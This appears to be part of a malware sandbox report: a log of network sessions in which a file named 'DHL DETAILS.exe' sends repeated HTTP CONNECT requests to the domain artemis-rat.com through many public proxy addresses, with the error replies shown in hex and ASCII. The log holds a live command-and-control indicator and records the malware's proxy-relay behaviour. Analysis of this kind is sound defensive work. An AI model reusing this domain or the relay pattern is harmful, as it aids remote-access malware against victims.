                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1587192.168.2.554886104.24.15.158806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.839073896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.994376898 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1588192.168.2.554902162.159.242.104806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.841696978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.002654076 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1589192.168.2.554924104.20.34.100806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.842283010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.996866941 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1590192.168.2.554669216.9.224.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.842500925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1591192.168.2.554692200.10.73.21056786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.844750881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1592192.168.2.55466693.171.220.22988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.876888037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1593192.168.2.554947104.19.5.247806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.879427910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.034162998 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1594192.168.2.55485138.162.8.22631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.888360023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1595192.168.2.554782185.109.184.150545656352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.888488054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.601188898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1596192.168.2.5547798.210.80.191156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.888920069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1597192.168.2.550171148.72.206.250357036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.894824028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.942517996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.020715952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1598192.168.2.55474578.30.128.1080806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.894826889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1599192.168.2.554701103.120.6.46806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.894911051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.303878069 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1600192.168.2.554856191.102.160.15731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.895164967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.118411064 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1601192.168.2.5540865.252.23.24931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.895591021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1602192.168.2.554741195.87.217.7533896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.895592928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1603192.168.2.554921153.92.214.224806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.895912886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.536391020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.224301100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1604192.168.2.554910107.180.95.17771286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.898211002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.473929882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.177397013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.567601919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.163888931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.864520073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.481827021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.677983999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1605192.168.2.554963104.20.235.179806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.898730040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.053267956 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1606192.168.2.55330436.64.27.12356786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.937033892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
